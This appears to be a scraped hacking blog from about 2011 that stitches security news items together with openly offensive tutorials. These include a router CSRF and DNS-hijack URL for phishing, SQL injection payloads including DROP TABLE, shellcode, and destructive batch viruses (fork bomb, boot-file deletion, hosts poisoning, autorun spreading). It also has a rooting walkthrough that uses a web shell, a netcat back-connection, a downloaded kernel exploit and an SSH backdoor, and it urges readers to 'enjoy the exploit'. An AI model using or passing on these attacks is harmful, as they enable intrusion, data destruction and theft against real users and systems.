Adobe confirms critical Flash zero-day bug

For the second time in the last four weeks, Adobe has told users that hackers are exploiting an unpatched bug in Flash Player, again by embedding malicious code inside a Microsoft Office document.

In a security advisory issued Monday, Adobe said that attackers are exploiting the vulnerability by embedding Flash attack files within a Microsoft Word document sent as an email attachment.

dobe did not spell out a patch timeline for the newest Flash zero-day.
Four weeks ago, Adobe issued a similar warning about a different flaw that hackers manipulated via attack code tucked inside Excel spreadsheet attachments.
Later, RSA Security confirmed that the March vulnerability had been used by cybercriminals to gain a foothold on its corporate network, then steal information related to the company's SecurID two-factor authentication products.
Adobe patched last month's Flash bug on March 21.
Mila Parkour, the independent security researcher who reported the newest Flash flaw to Adobe, said attackers have inserted a malicious Flash Player file into a Word document named "Disentangling Industrial Policy and Competition Policy," which is then sent to targeted recipients as an attachment.
The email message's subject heading is "Disentangling Industrial Policy and Competition Policy in China," Parkour said in an April 6 entry on her Contagio Malware Dump blog.
One message that Parkour cited claimed the attached Word document was a copy of the American Bar Association's Antitrust Source newsletter, hinting that the target recipients may have been the legal departments at corporations or government agencies.
People seeing the email and attachment could be expected to fall for the ruse, since the most recent issue of Antitrust Source does contain an article by the same name. The legitimate article is available on the newsletter's Web site ( download PDF document).
Parkour has reported numerous vulnerabilities to Adobe, including one last September in the company's popular PDF viewer, Adobe Reader.
The Flash vulnerability also exists in Adobe Reader and Acrobat, both of which include code that renders Flash content inserted into PDF files.
"At this time, Adobe is not aware of any attacks via PDF targeting Adobe Reader and Acrobat," Adobe said in the advisory.

Last month, Microsoft urged Excel users to install and run the Enhanced Mitigation Experience Toolkit (EMET) to block those attacks, and said that Excel 2010 was not susceptible to the exploit because of its "Protected View" sandbox.
While those same recommendations may apply today for Word, Microsoft was not immediately able to confirm that to Computerworld.
Currently, only one anti-virus firm, Commtouch, has issued a signature that tags the rogue Word document as a threat, according to VirusTotal, a free service that analyzes suspicious files.
Flash vulnerabilities are an attractive target to hackers, said Andrew Storms, director of security operations at nCircle Security. When asked if the rash of Flash flaws meant it was time for companies to consider ditching the browser plug-in, Storms answered, "That's going to be incredibly hard due to the pervasiveness of its use in valid business systems."

IE9 exploit puts Windows 7 SP1 at risk

A new exploit for IE9 bypasses all security measures in even the latest fully patched version of Windows 7, according to a French security company Vupen.
The exploit uses an unpatched zero-day vulnerability in Internet Explorer 9 and bypasses all the extra security measures of Windows 7. The latest version of Microsoft's operating system, fully up-to-date with service pack 1 (SP1), is vulnerable. The security hole was reported by the French security company Vupen, that previously discovered an IE8 vulnerability in December of last year.(MS11)

Vupen classifies the exploit for IE9 as reliable, which means it's an effective way for cyber attackers to run malicious code of their choosing on Windows 7 PCs. The exploit manages to break through Windows' additional security layers, such as ASLR, DEP and the sandbox (Protected Mode) in IE9.
"The exploit uses two distinct vulnerabilities. The first one allows execution of arbitrary code within the IE9 sandbox. The second one allows the bypass of the sandbox to achieve full code execution," Vupen's CEO Chaouki Bekra told Dutch IDG news site Webwereld.
The risk of this exploit so far is limited: exploit code has not been spotted in the wild. The vulnerabilities were discovered by researchers from Vupen, who made their own exploit. "We confirmed the exploitability of the vulnerability and we created a code execution exploit which works with Internet Explorer 9 on Windows 7 and Windows 7 SP1," Bekra said.
Bekra stressed that the vulnerabilities have not been publicly disclosed. "Access to our code and to the in-depth analysis of the vulnerability is restricted to our government customers who use the information to protect their critical infrastructures," he said.
IE9 is not much in use by governments or even companies. However, the vulnerability is not limited to the latest version of Microsoft's browser. The security hole is also present in IE8, 7 and 6, for which Vupen has not made a working exploit.
"The flaw affects Internet Explorer 9, 8, 7, and 6, and results from a use-after-free error within the 'mshtml.dll' library when processing a specific combination of HTML and JavaScript code." Vupen advises all IE users to disable JavaScript or use another Web browser which is not affected by the vulnerability.
Vupen's exploit code is only effective on IE9, which can run on Windows 7 and predecessor Windows Vista. IE9 has recently been released and is not yet being distributed through Windows Update. Microsoft will start that rollout in the coming weeks. An exact date for the wider distribution and installation of the latest Windows browser has not been disclosed.
IE9 currently has a market share of 3.6 percent amongst Windows 7 users, according to figures from market researcher NetApplications. Windows 7 itself has a global market share of nearly 25 percent. Windows XP still has a larger installed base.
Measured across all PC users IE9 has a market share of only 1.04 percent, reports NetApplications. Competitor StatCounter doesn't even show IE9 as a separate browser in its market share overview, but puts it in the category "other."

IPAD 2 JAILBROKEN IN JUST ONE WEEK

Hackers have already managed to break open Apple's latest iPad, with developer and hacker Comex saying he had managed to do so remotely over the weekend. While proof of the jailbreak has shown up in photos and video on the Internet, it will not be made available immediately as it must be packaged for public use.

According to talk on Twitter, versions for both the Wi-Fi and 3G models of the iPad could be released shortly, although no specific date for its release has been given.

While the speed of the jailbreak may be surprising, iOS 4.3 (which the iPad runs on) had also been cracked open quickly: hackers there only needed about 24 hours. In that case developers likely had access to beta versions of the operating system, allowing those working on the crack to test out their work before iOS 4.3's actual release.

Details on the actual jailbreak have not been disclosed, probably to prevent Apple from moving quickly to close the hole. "Would've had it yesterday if I didn't have to spend 1.5 days looking for a replacement exploit (which came from a most unexpected place…)," Comex tweeted Sunday.

He also used a friend's iPad nearly 2,500 miles away and jailbroke it remotely, meaning whatever was done to hack the tablet device may be able to be done akin to what the iPhone Dev Team did with jailbreakme.com last August.

As always, jailbreaking any iOS device comes with risks. There is no guarantee that the hack will work on every device, and updates can sometimes cause the hack to stop working. Additionally, Apple's warranty becomes void if a device is jailbroken.

MHTML EXPLOIT LATEST MICROSOFT BUG :P

Latest microsoft MHTML exploit is in fashion for hackers ;)

Microsoft is investigating new public reports of vulnerability in all supported editions of Microsoft Windows. The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting various Web sites, resulting in information disclosure. This impact is similar to server-side cross-site scripting (XSS) vulnerabilities.

MHTML, or Mime HTML, is a standard that allows web objects such as images to be combined with HTML into a single file. The vulnerability lies in how MHTML interprets Multipurpose Internet Mail Extensions (Mime) for content blocks in a document.

On a Blog post Friday afternoon Google Security Team members said “We’ve noticed some highly targeted and apparently politically motivated attacks against our users. We believe activists may have been a specific target. We’ve also seen attacks against users of another popular social site.”

Now we are finding that Microsoft and Google are working to create a fix on the server side so it can reduce the risk of MHTML Vulnerability, while you can check your machine to determine if you are vulnerable by using the test scenario previously posted by Microsoft.

As a workaround user can also disable ActiveX, but this would affect web applications including banking and e-commerce sites that use ActiveX to provide online services.
 May be a sad news for normal users but :D you know what i mean to say enjoy the exploit guys its not patched yet :P

PWNING ROUTERS(BSNL)

Hello Mates, This is my first post here

Today im going to show you how a series of vulnerabilities in a web Application could be creatively exploited.

Product Description:

The product which i had my hands on is this UTSTARCOM router,

It is one of the most common ADSL Modem cum Router which was rolled out by
BSNL to their customers a year ago, when the number of internet subscribers was reaching the peak. This little devices runs a webserver which serves the web based router configuration application.Further it has a Telnet service running on it.

The So Called BuiltIn Security Features :

* Remote Web Access to the router is blocked by Default [so you can't access a victim's router by using his public IP]

* Remote Telnet Access is also blocked

After a little playaround with the device, i've found that there are 3 different users that can login into the router.

viz admin,user,support

The Documentation Provided by
BSNL neither states that there are 3 different users that could access the device nor forces/asks/shows the users to change their default password for accessing the router [Note: Im not mentioning the PPoE Password]

http://www.chennai.bsnl.co.in/BBS/UT300R2U.htm

User Description:
As the name suggests, admin user has the ablility to do all configuration changes to the router, whereas the user privileged user could not do any changes in the configuration of the router.

Logged in as Admin:

Logged in as User:

Vulnerablility Description:

On a closer examination of the source code,i got hold of a javascript menuBCM.js

menuBCM.js:

function menuAdmin(options) { // All the options are displayed for ADMIN
var std = options[MENU_OPTION_STANDARD];
var proto = options[MENU_OPTION_PROTOCOL];
var firewall = options[MENU_OPTION_FIREWALL];
var nat = options[MENU_OPTION_NAT];
var ipExt = options[MENU_OPTION_IP_EXTENSION];
var wireless = options[MENU_OPTION_WIRELESS];
var voice = options[MENU_OPTION_VOICE];
var snmp = options[MENU_OPTION_SNMP];
var ddnsd = options[MENU_OPTION_DDNSD];
var sntp = options[MENU_OPTION_SNTP];
.
.
if ( user == 'admin' ) //this piece of code calls the respective menu to be displayed
menuAdmin(options);
else if ( user == 'support' )
menuSupport(options);
else if ( user == 'user' )
menuUser();
}

-------------code truncated
 so it is pretty obvious from the code that the user privilege management is handled by this javacript by displaying all menu's to Admin and hides configuration menu's to the user.

so it is possible to navigate to the configurations page by a user if he knows the URL

The default username password combination is

admin:admin
user:user

Since we know that the user privilege management is handled by a javascript, it has got nothing to do in a telnet session, so when we telnet as either a admin or as a user, we get full access [privilege] to the router.

Further adding fuel to the fire, CSRF is present in the webbased configuration application

Exploiting Methods:

First and foremost point is we can't access the victim's router from WAN,

As CSRF vulnerability is present on the router, this script will do the job

http://user:user@192.168.1.1/scsrvcntr.cmd?
action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp=0
 Since there user:user account is some sort of hidden/undisclosed account, the possiblity of its default password being changed is very less.

we could send this link to a victim either in a email or by some SE techniques, what this does is, it changes the router configuration and allows Remote Web access, Remote Telnet access on the router.

The entire Exploit looks like this

1)index.html

2)config.html

So after the user visits this page, we will have his IP in our database or somewhere depending upon the IP logger script.
Now we can login into his router either by telnetting or by logging into the webapplication.

Even though the victim changes the admin password for the device, we could log in as user:user and navigate into password.html page and viewing source --Kabboomm Plain text passwords in javascripts

passwords.html

So now we got admin access on both TELNET service and webservice, now here comes a variety of exploitation techniques

Possible Attacks:

1.Denial of Service:

1.The attacker might implement MAC filtering or other IP restriction on the victim’s router.

2.Specifying a unreachable Static Route
3.Killing the httpd server process of the router repeatedly by telneting into the victim’s router.

2)Sniffing

1.The attacker could specify a static route passing through his network for the victim’s router and sniff the traffic from the victim. [SSL Strip + Ettercap + Wireshark]

3.Phishing:

This is the attack of our special interest as it is one of the stealthiest attack when combined with routing attacks.

The attacker could specify a fake DNS server for the victim router and could carry out phishing attacks.

http://192.168.1.1/dnscfg.cgi?dnsPrimary=XX.XX.XX.XX&dnsSecondary=XX.XX.XX.XX&dnsDynamic=0&dnsRefresh=1
XX.XX.XX.XX = Attackers DNS server

This changes the primary & secondary DNS servers of the victim’s router

Now the victim's network is like this

So we can specify our phishing sites IP address as A Records for famous websites like facebook,orkut,banking sites etc etc in our DNS server.

You can download the whitepaper here
Peace.. Similar vulnerablility is found in Nokia-Simens and many other Home Routers
Fairly long post, isn't it ?
Comments and Suggestions are Welcomed.

Packet Fence v2.0.1

PacketFence is a Open Source network access control (NAC) system.

packetfence
Many of us are familiar with network access control systems. A Network Access Control (NAC) is a computer networking solution that uses a set of protocols to define & implement a policy that describes how to secure access to a network nodes by devices when they initially attempt to access the network. NAC might integrate the automatic remediation process (fixing non-compliant nodes before allowing access) into the network systems, allowing the network infrastructure such as routers, switches and firewalls to work together with back office servers and end user computing equipment to ensure the information system is operating securely before interoperability is allowed.

What you can do with PacketFence :

  • Block iPods wireless access
  • Forbid rogue access points
  • Perform compliance checks
  • Eliminate Peer-to-Peer traffic
  • Provide guest access
  • Simplify VLAN management

PacketFence has very good advance features.

Registration
PacketFence supports an optional registration mechanism similar to “captive portal” solutions. An Acceptable Use Policy can be specified such that users cannot enable network access without first accepting it. The duration of a node registration can be a relative value (eg. “four weeks from first network access”) or an absolute date (eg. “Thu Jan 20 20:00:00 EST 2009″).

Detection of abnormal network activities
Abnormal network activities (computer virus, worms, spyware, etc.) can be detected using local and remote Snort sensors. Beyond simple detection, PacketFence layers its own alerting and suppression mechanism on each alert type. A set of configurable actions for each violation is available to administrators.

Proactive vulnerability scans
Nessus vulnerability scans can be performed on a scheduled or ad-hoc basis. PacketFence correlates the Nessus vulnerability ID’s of each scan to the violation configuration, returning content specific web pages about which vulnerability the host may have.

Isolation of problematic devices
PacketFence supports several isolation techniques, including VLAN isolation with VoIP support (even in heterogeneous environments) for multiple switch vendors

Remediation through a captive portal
Once trapped, all HTTP, IMAP and POP sessions are terminated by the PacketFence system. Based on the nodes current status (unregistered, open violation, etc), the user is redirected to the appropriate URL. In the case of a violation, the user will be presented with removal instructions for the particular infection he/she has.

802.1X
802.1X is supported through a FreeRADIUS module.

Wireless integration
PacketFence intregrates perfectly with wireless networks through a FreeRADIUS module. This allows you to secure your wired and wireless networks the same way.

DHCP fingerprinting
DHCP fingerprinting can be used to automatically register specific device types (eg. VoIP phones) and to disallow network access to other device types (eg. game consoles).

A good list of switches are also supported.

We have just started to test it in a test environment. Before the actual implementation, we will keep you updated and you can leave your comments .

What Is Ddos Attack And How Does It Work?

What Is Ddos Attack And How Does It Work?

Many of people in illusions that Website hacking and Attacking is very Difficult and only some hackers and professionals can Do It... Now that's absolutely wrong thinking... Its as Easy as alphabetic.

First of all We all should know What are the Different Methods Of attacking Websites...
There are Generally Three Methods of Attacking an Website...

1. Ddos Attack
2. Shell Scripts Attack

3. Javascript Attack or Attack through Scripting.

Note: SQL and other techniques comes in the Hacking Websites Part Not in attacking Part. Attacking is simply for fun or intentionally causing damage to the Website..

Ddos Attack

What is a Distributed Denial of Service (DDoS) attack?

Have you ever tried to make a telephone call but couldn't because all the telephone circuits were busy? This may happen on a major holiday and often happens on Diwali,New year etcc.

The reason you couldn't get through is because the telephone system is designed to handle a limited number of calls at a time.

So upto now you will Got an Idea What is Ddos(Distibuted Denial of Service) Attack.
Basically Ddos attack is an attack which makes the Network So congested such that no further Requests are delivered.

This is Done by making a number of connections to the Websites through Different Computer or Networks. Also can be done from One Computer by making Connections through Different Ports as there are 64k ports available in Windows OS.

How Attacker Launch a Ddos Attack?

Over past years Denial of service attack has made huge amount of damage,Many of the have been victimed of this attack

Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

This attack also recently hit twitter on 6th August 2009,lot of people had trouble on logging on twitter,It was brought down by denial of service attack,They tired up there server so no one can get on log on it.Websites like facebook, eBay etc have also been victim of this attack.

First, Attackers build a network of computers that will be used to produce the volume of traffic needed to deny services to computer users. We'll call this an "attack network".

To build this attack network, Attackers look for computers that are poorly secured, such as those that have not been properly patched, or those with out-of-date or non-existent anti-virus software. When the Attackers find such computers, they install new programs on the computers that they can remotely control to carry out the attack.

These days, however, the process of building an attack network has been automated through self-propagating programs. These programs automatically find vulnerable computers, attack them, and then install the necessary programs. The process begins again as those newly compromised computers look for still other vulnerable computers.

Once an attack network is built, the intruder is ready to attack the chosen victim or victims. Some information security experts believe that many attack networks currently exist and are dormant, passively waiting for the command to launch an attack against a victim's computers. Others believe that once a victim has been identified, the attack network is built and the attack launched soon afterward.

So guys i think this is enough for today hope you all now familer with Ddos attack in future post will we show how to do Ddos attacks with various hacking tools like Serve Attack Pro and LOIC (Low Orbit Ion Cannon) and other exploits.

and if you want to try ddos then comment here and tools wil b delievr to your inbox

What Is SQL Injection & How Does It Work

What Is SQL Injection & How Does It Work

SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.

SQL injection vulnerabilities have three forms:

Incorrectly filtered special characters: escape characters

This form of SQL injection occurs when the user manipulates the SQL statements using characters such as ’. For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:
“SELECT * FROM users WHERE password = ’” + password + “‘;”

Now suppose the userName and/or password so entered are” ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:

“SELECT * FROM users WHERE password =’ ‘or ‘1’=’1 ‘;”

Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.

List of Some Important inputs used by hackers to use SQL Injection technique are:
a) ‘ or ‘a’=’a
b) ‘ or 1=1 –
c) ‘ or 1=1; –
d) ‘; select * from *; –
e) ‘ (Single quote)(Here we look at the error)
f) ‘; drop table users –

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):
a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%

Incorrectly handling input data type

This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:
“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:

1. ‘ having 1=1 –
2. ‘ group by user.id having 1=1 –
3. ‘ group by users.id, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –

Vulnerabilities inside the database server

Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.
If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—

1. Extended Stored Procedure Attacks
2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.

So guys I think now you should absolutely aware of what SQL injection is so in my next post we will discus how to hacks website' database or website form this method.

What is exploit and how to use it?

What is an exploit

An exploit is a computer programm, which circumvent computer security. There are many ways to exploit security holes. If a computer programmer make a programming mistake in a computer program, it is sometimes possible to circumvent security. The coding of such programs, which attack (hack) the programming mistakes or security holes is the art of exploitation or exploit coding. Some common exploiting technics are stack exploits, heap exploits, format string exploits, ...

What is an stack exploit

A stack exploit occurs, if you can write more than the size of a buffer located on the stack into this buffer. If you can write more data, as the size of the buffer (more than 1024 bytes in this example) a stack overflow occurs. For example:

main(int argc, char **argv)
{
// This buffer is located at the stack
char buf[1024];
// i is located on the stack
int i;

// A 6 byte stack buffer overflow
for(i=0;i<1030;i++) buf[i] = 'A' // Another example // if argv larger than 1024 a overflow occur strcpy(buf, argv[1]); } Why a stack overflow is a security threat ? The assembler instruction 'call' push the return address on the stack. 'call' jump into a function in our example the function is main. If the function returns with the assembler instruction 'ret', it returns to the function pointer at the stack. If you can overflow the stack you can overwrite the return address located at stack. You can return to another location. The location should a pointer to a shellcode address. Read alephonestack.txt for more information. You can download it at my papers section. What is a shellcode

Shellcode are machine instructions, which launch a shell for example. A shellcode looks like this:

char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62 \x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\ xcd\x80";

Every char is a machine instruction. \xcd\x80 is 'int 80' for example. After an overflow occur we need a address to return. This shellcode launch a shell. If you point to the shellcode (after a stack overflow for example), the machine instructions are launched and spawns a shell. Compile this program. It tests the shellcode and spawns a shell:

// Compile this program with gcc sctest.c -o sctest and start it: ./sctest
// now you have someting like
// sh-2.03$

#include

char shellcode[]=
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\ x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\ xcd\x80";
int
main()
{
void (*dsr) ();
(long) dsr = &shellcode;
printf("Size: %d bytes.\n", sizeof(shellcode));
dsr();
}

read alephonestack.txt for basic shellcode coding

What are heap overflows

If the heap is overflowed a heap buffer overflow occurs.
A heap overflow looks like that:

// It dynamically create a 1000 byte buffer on the heap.
main(int argc, char **argv)
{
// pointer points to a heap address
char *pointer = malloc(1000);
char *pointer2 = malloc(200);

// Overflowed, if argv[1] is larger than 1000 bytes.
// The buffer pointer 2 is overflowed if pointer
// contains more than 1000 bytes.
strcpy(pointer, argv[1]);

// Free dynamically allocated data
free(pointer)
free(pointer2);
}

Format String exploit's ?

If you control the format string in one of the printf, syslog or setproctitle function, a exploitation is possible. Format strings are something like "%s", "%x", "%d", ... For example:

main(int argc, char **argv)
{
char *buf = "TEST";

// The wrong way
// The user can control the format string
printf(argv[1]);

// You should code:
printf("%x", argv[1]);
}

How dangerous could a batch file be?

How dangerous could a batch file be?

Hi freinds, today we could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, we have focused on making the basics of batch files clear and developing the approach to code your own viruses.

What are Batch Files?

Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat

Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files, format data, steal information, irritate victim, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

2. Folder flooder

@echo off
:x
md %random% // makes directory/folder.
goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

3.User account flooder

@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

4.Shutdown Virus

copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

5. Deleting boot files

Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.

6. Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

7. Extension Changer

@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

Every extension is associated with a file type like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.

Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wouldn’t open properly.

8. DNS Poisoning

There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.

Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Viruses we just coded

Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.

2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.
first download this Batch To Exe coverter with the help of goggling .

After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

# Introduction- Hello All, This My second paper after Sql Injection. My first was much
successful :) thanks
to all for all those Lovely compliments. This paper will not be so long as my first one was
of 14 pages :D.
Let's Start,
# Things you need-
=> A Shell on a website
=> An Exploit
=> Log cleaner
=> Ssh Backdoor
=> Netcat
=> A Brain
=> Get these from Google ;) lolz
# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.
# What is the need of rooting ?
A. Getting Juicy info :)
Now I begin,
# Getting Backconnection to the server-
=> Copy the Netcat directory to C:\
=> Open command prompt, type: CD C:\NETCAT
It'll look like this:
[code]
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Ash>cd c:\netcat
c:\netcat>
[/code]
=> Now Type: nc -l -v -p 2121
It'll look like-
[code]
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...
-1-

[/code]
=> Open your Shell in your browser, go to the backconnection tab, if it is not there get a
shell like "B374k" or Any other
thats your choice.
=> Specify your ip & port as 2121. press connect, now you'll get a shell to the server, you
can give commands to the server through that shell.
# Getting a Right exploit for the server-
=> Type : Uname -a & hit enter.
It'll look something like this:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010
x86_64 x86_64 x86_64 GNU/Linux
[/code]
=> It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.
=> You need to find a perfect exploit for it. you can find them at-
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# Compiling & executing exploit-
=> Now I've got a exploit, & it is written in C. So I can't execute it by just uploading.
but I need to compile it.
=> Before proceeding further, Cd into the tmp directory, coz it is always writable. So type:
Cd /home/XXXXX/public_html/tmp
// The path can be different, replace it with yours.
=> So first I'll get the exploit on the server, So I type : Wget
http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ wget
http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'
0K .......... .... 100% 189K=0.08s

[/code]
-2-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
=> now change the permission of the exploit to 777.
Type: Chmod 777 exploit.c
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ chmod 777 ImpelDown.c
[/code]
=> Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as => exploit
It may look like-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ gcc -o exploit exploit.c
[/code]
=> Next step is to execute it So we'll type: ./exploit
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ gcc -o ImpelDown.c
got root you m0f0 !!
[/code]
=> Now it say got root. Let's Check is it true,
Type: id
It may look like
[code]
uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
[/code]
=> Which Means I got root :)
# Installing Backdoor-
=> type- Wget urlofbackdoor.com/sshdoor.zip
=> Then Type,
Unzip Sshdoor.zip
=> Then type, ./run pass port
^ replace pass with your password, & a port.
=> Now connect with putty & enjoy root privileges. ;)

ifconfig | grep Addr
^ Get the local Internet Protocol and Hardware address(s) for your machine
cat binary | awk "{print $5}"

$(echo "HEAD / HTTP/1.0";echo "";echo "") | telnet host 80
^ Get the webserver type and identification
The best feature of bash is piping. Piping means threading the output of one
program to another. For example you can do ls | more to pipe the output of
ls to more and easily read the contents of large directories. You can also do
ls | grep myfile to find myfile in the current directory.
cd /;find | grep goodfile
^ Search the entire FileSystem for a file called goodfile
su -x "command"
^ Run a command as root
sudo command
^ Run a command as a su-uid user
chmod a+rwx file
^ Change the permissions of a file and make it executable, readable, and writable to all users
rm removes a file only if the user deleting it has permissions to that file.
rm -f removes a file forcibly (permissions still apply).
rm -rf recursively and forcefully remove a directory. You should know about permissions by
now.

Facebook unveils security tools after Zuckerberg's page hacked

Facebook today announced two new security measures -- wider use of HTTPS and the introduction of "social authentication" -- less than 24 hours after the Facebook page of company founder Mark Zuckerberg was defaced by a hacker.

A blog post by Facebook's Alex Rice ties the security announcement to Friday being "Data Privacy Day," but the press and bloggers are having a high time connecting the news and Zuckerberg's victimization, whether or not there is actually any connection.

